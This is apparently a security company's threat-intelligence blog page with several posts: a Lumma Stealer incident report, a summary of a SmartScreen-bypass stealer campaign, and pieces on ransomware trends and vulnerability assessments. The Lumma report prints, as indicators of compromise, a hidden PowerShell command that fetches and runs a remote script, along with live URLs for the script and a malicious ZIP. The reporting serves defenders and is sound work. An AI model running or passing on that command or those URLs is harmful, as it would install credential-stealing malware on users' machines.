Category: Threat Intelligence

In the Wild Lumma Stealer Analysis Report
Incident Overview

This report covers a credential-stealing malware identified through Shield Security Operation team, named Lumma Stealer. The user downloaded a laced pdf file which leveraged PowerShell script to fetch a TXT file and then downloaded and executed a malicious ZIP file. Detailed analysis reveals the sequence of processes involved and the execution of suspicious commands. The following sections describe each stage of the attack and its associated indicators.

The Threat Intelligence team at Shield53 has identified multiple similar attacks, with Indicators of Attack displaying a short lifespan of 4 to 8 hours. Threat actor groups are frequently rotating links and resources to evade detection.

Detection Summary

Processes Involved:
- explorer.exe
- powershell.exe
- Set-up.exe
- more.com
Command Execution

The suspicious process powershell.exe was triggered with a hidden window and executed the following encoded command:

Powershell

“C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe” -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

Analysis:

This command uses Invoke-Expression (iex) to run a PowerShell command directly from the output of Invoke-WebRequest (iwr). The PowerShell script fetches a TXT file from the URL:

https*:*//iilp*.*b-cdn*.*net/kolo26*.*txt

Retrieved Script Analysis (kolo26.txt):

The TXT file, upon analysis, contained the following script:
Malicious ZIP File URL: https://261024vexea.b-cdn.net/lopi100.zip
- Download Path: $env:TEMP\pgl.zip
- Extraction Path: $env:TEMP\file
- Execution Path: $env:TEMP\file\Set-up.exe
This script downloads a ZIP file, extracts its contents, and launches the executable Set-up.exe, indicating a classic delivery method for malware to evade initial detection and execute the payload.

Execution and Analysis

The final payload, Set-up.exe, was executed after extraction. Further details from the AnyRun sandbox environment provide insights into the behavior of this executable and its role in the credential-stealing process.

Indicators of Compromise (IOCs)

PowerShell Command

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe -W Hidden -eC iex (iwr https://iilp.b-cdn.net/kolo26.txt -UseBasicParsing).Content

TXT File URL

https://iilp.b-cdn.net/kolo26.txt

ZIP File URL

https://261024vexea.b-cdn.net/lopi100.zip

File Path

C:\Windows\SysWOW64\more.com

Analysis Links:
- TXT File Analysis on AnyRun
- ZIP File Analysis on AnyRun
November 5, 2024
Recent Info Stealer Phishing Campaigns
This article presents a detailed analysis of a stealer campaign exploiting CVE-2024-21412, a security bypass vulnerability in Microsoft Windows SmartScreen. The vulnerability enables remote attackers to bypass the SmartScreen security warning dialog, thereby facilitating the delivery of malicious files. Over the past year, notorious threat actors such as Water Hydra, Lumma Stealer, and Meduza Stealer have leveraged this vulnerability to execute various malicious campaigns.

Attack Methodology

The campaign begins with the attacker constructing a malicious link that leads to a URL file. Once the victim interacts with the link, it downloads an LNK file, which in turn fetches an executable file embedding an HTA script. This script decodes and decrypts PowerShell code, which subsequently downloads additional files, including a decoy PDF and a malicious shell code injector.

Stealer Deployment and Injector Techniques

The campaign employs two main types of shell code injectors:
1. Image-Based Injector: This injector downloads a seemingly harmless image file, from which it extracts shell code through pixel manipulation using the Windows API GdipBitmapGetPixel. The shell code is then executed to download and deploy stealers such as HijackLoader, Lumma Stealer, and ACR Stealer.
2. Straightforward Injector: This injector decrypts its code from the data section and uses a sequence of Windows API functions (like NtCreateSection and NtMapViewOfSection) to inject the shell code, ultimately deploying the Meduza Stealer.
Final Payloads

The attack culminates in the deployment of various stealer variants, including Meduza Stealer and ACR Stealer. These stealers are capable of exfiltrating sensitive data, including browser credentials, cryptocurrency wallets, FTP clients, email clients, and even specific Chrome extensions. The Meduza Stealer communicates with its C2 server via a panel, while the ACR Stealer uses a dead drop resolver technique, leveraging platforms like Steam to hide its C2 communications.

Mitigation Strategies

To counteract such sophisticated attack vectors, it is imperative for organizations to:
- Educate Users: Users should be made aware of the risks associated with downloading and executing files from unverified sources.
- Implement Robust Security Protocols: Proactive security measures, including advanced endpoint detection and response (EDR) systems, should be employed.
- Regular Security Audits: Organizations should conduct frequent security audits and vulnerability assessments to identify and mitigate potential risks.
Conclusion

This stealer campaign underscores the evolving tactics employed by cybercriminals to bypass security measures and execute sophisticated attacks. Organizations must remain vigilant and adapt their cybersecurity strategies to address these advanced threats effectively.

Reference

Detailed InfoStealer Investigation by Fortinet Team: https://www.fortinet.com/blog/threat-research/exploiting-cve-2024-21412-stealer-campaign-unleashed
September 3, 2024
The Evolving Threat of Ransomware: A New Tool to Disable EDR

Introduction

As ransomware threats evolve, so do the tools and tactics employed by cybercriminals. A recent warning from cybersecurity experts highlights a new capability in a tool used by ransomware gangs, which could significantly impact the efficacy of endpoint protection software.

The Emergence of Poortry/BurntCigar

Sophos researchers have recently identified the use of an updated toolset, known as Poortry or BurntCigar, by ransomware groups. Traditionally, this toolset was known for its ability to terminate the processes of Endpoint Detection and Response (EDR) systems, allowing ransomware to infiltrate systems with minimal resistance. However, in a concerning development, this tool has now been observed to completely delete EDR components from victim systems.

The New Threat Landscape

This new capability was first reported by Trend Micro last year, but the recent Sophos investigation marks the first time this EDR-wiping functionality has been seen in action. The implications are significant: by eliminating EDR software, ransomware groups can clear the way for their malware to operate unchecked, making it even more challenging for defenders to respond in time.

Implications for Cybersecurity

The ability to wipe out EDR software represents a serious escalation in the capabilities of ransomware gangs. It underscores the need for organizations to adopt a multi-layered security approach that includes regular backups, network segmentation, and robust incident response strategies.

Conclusion

As ransomware tools become more sophisticated, cybersecurity defenses must evolve in tandem. The discovery of Poortry’s enhanced EDR-wiping ability is a stark reminder that the fight against ransomware is far from over. Continuous vigilance, combined with adaptive security measures, is essential to protect against these ever-evolving threats.

Call to Action

Stay informed about the latest cybersecurity threats and ensure your organization’s defenses are up to date. Consider conducting regular security assessments and investing in advanced threat detection capabilities to stay ahead of cybercriminals.

August 29, 2024
The Evolving Cyber Threat Landscape
In today’s rapidly evolving digital world, cyber threats are becoming increasingly sophisticated and frequent. Organizations of all sizes face a growing array of risks, from ransomware and phishing attacks to zero-day exploits and advanced persistent threats (APTs). To protect against these ever-evolving threats, it is crucial for businesses to conduct regular vulnerability assessments. This proactive approach helps identify, prioritize, and remediate security weaknesses before they can be exploited by malicious actors.

Understanding the Threat Landscape
1. Ransomware Attacks:
  
  Ransomware attacks continue to be one of the most disruptive forms of cybercrime. In 2024, ransomware incidents have surged, targeting critical infrastructure sectors such as healthcare, finance, and energy (Canadian Centre for Cyber Security) . Attackers encrypt critical data and demand a ransom for its release, causing significant operational disruptions and financial losses.
2. Phishing Attacks:
  
  Phishing remains a prevalent threat, with attackers using increasingly sophisticated techniques to deceive users into revealing sensitive information or downloading malicious software. In North America, phishing was involved in 36% of data breaches, leading to credential theft and unauthorized access (Canadian Centre for Cyber Security) .
3. Advanced Persistent Threats (APTs):
  
  APTs are long-term targeted attacks where cybercriminals infiltrate an organization’s network and remain undetected for extended periods. These attacks are often state-sponsored and focus on stealing sensitive data or intellectual property .
4. Zero-Day Exploits:
  
  Zero-day vulnerabilities are security flaws that are unknown to the software vendor and have no available patches. Cybercriminals exploit these vulnerabilities to launch attacks before the vendor can issue a fix, making zero-day exploits highly dangerous .
The Importance of Regular Vulnerability Assessments
1. Proactive Risk Identification:
  
  Regular vulnerability assessments help identify security weaknesses before they can be exploited. By proactively scanning systems, applications, and networks, organizations can discover vulnerabilities early and take corrective actions to mitigate risks.
2. Enhanced Security Posture:
  
  Conducting frequent assessments ensures that your organization’s security measures are up-to-date and effective against the latest threats. This continuous improvement process helps maintain a robust security posture and reduces the attack surface.
3. Regulatory Compliance:
  
  Many industries are subject to stringent regulatory requirements regarding data protection and cybersecurity. Regular vulnerability assessments help organizations meet compliance standards such as GDPR, HIPAA, PCI-DSS, and ISO 27001, avoiding legal penalties and protecting sensitive information .
4. Cost-Effective Security:
  
  Identifying and addressing vulnerabilities early can save organizations significant costs associated with data breaches, including financial losses, reputational damage, and legal fees. Preventive measures are often more cost-effective than reactive responses to security incidents.
5. Informed Decision-Making:
  
  Vulnerability assessments provide detailed insights into the security status of your IT infrastructure. These insights enable informed decision-making regarding resource allocation, security investments, and risk management strategies.
The dynamic nature of cyber threats necessitates a proactive and continuous approach to security. Regular vulnerability assessments are a critical component of an effective cybersecurity strategy, helping organizations identify and mitigate risks before they can be exploited. At Shield 53, we specialize in conducting comprehensive vulnerability assessments to ensure your business remains secure against evolving threats. By staying ahead of potential vulnerabilities, you can safeguard your digital assets, maintain regulatory compliance, and protect your organization’s reputation.

For more information on our vulnerability assessment services and how we can help your organization, contact us today. Let’s work together to secure your digital future.
June 26, 2024
The Growing Ransomware Threat in 2024

Ransomware attacks have surged in 2024, presenting a significant and growing threat to organizations worldwide. According to the latest reports, ransomware incidents have increased by 68% compared to the previous year. Notably, the LockBit ransomware gang has been responsible for some of the largest ransom demands, including a staggering $80 million following an attack on Royal Mail. These attacks have become more sophisticated, with cybercriminals utilizing zero-day vulnerabilities and evolving their tactics to target a higher volume of victims simultaneously (Sophos News) (Rapid7).

The financial impact of ransomware attacks has also escalated. The average ransom payment has increased fivefold over the last year, from $400,000 to $2 million (Rapid7) (SecurityWeek). Interestingly, while the number of attacks has slightly decreased, the overall recovery costs have soared to an average of $2.73 million per incident, highlighting the substantial financial burden on affected organizations. Despite these rising costs, more than half of the organizations hit by ransomware have admitted to paying the ransom to recover their data, reflecting the desperation and critical nature of these situations.

Moreover, the threat landscape continues to evolve with an increasing trend of data exfiltration, where cybercriminals steal sensitive data in addition to encrypting systems. This dual threat of data theft and encryption has intensified the pressure on organizations to bolster their cybersecurity measures. As ransomware remains a top priority for executive leadership, with many companies making significant investments in prevention and recovery strategies, it is clear that combating this menace requires continuous vigilance and robust security practices (Malwarebytes) (SecurityWeek).

For more details on the latest ransomware trends and defense strategies, refer to the comprehensive reports from Sophos, Rapid7, and Malwarebytes (Sophos News) (Rapid7) (Malwarebytes) (SecurityWeek).

March 7, 2024